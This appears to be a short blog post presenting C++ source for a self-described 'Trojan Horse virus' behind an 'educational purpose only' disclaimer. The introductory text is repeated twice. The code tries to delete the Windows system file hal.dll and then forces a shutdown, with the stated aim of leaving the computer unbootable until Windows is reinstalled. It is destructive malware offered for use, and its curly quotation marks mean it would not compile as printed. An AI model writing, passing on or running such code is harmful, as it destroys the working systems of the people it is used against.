NOTE: WE ARE NOT RESPONSIBLE FOR ANY KIND OF DAMAGE IF SO OCCURED.
THIS CODE IS ONLY FOR EDUCATIONAL PURPOSE.
DON'T MISUSE IT.
Create a Simple and Powerful Trojan Horse virus in C++. It deletes an essential file that need for the computer to operate well. Thus the PC will shutdown and will never Turn on (until install new Windows)
You need Dev C++, Borland Turbo C++, Visual C++ or similar to compile this code.
Download Turbo C++ from Here
Here is the code:
THIS CODE IS ONLY FOR EDUCATIONAL PURPOSE.
DON'T MISUSE IT.
Create a Simple and Powerful Trojan Horse virus in C++. It deletes an essential file that need for the computer to operate well. Thus the PC will shutdown and will never Turn on (until install new Windows)
You need Dev C++, Borland Turbo C++, Visual C++ or similar to compile this code.
Download Turbo C++ from Here
Here is the code:
#include<iostream>
#include<cstdlib>
using namespace std; int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
0 comments:
Click Here To add Comment
Blogger Widgets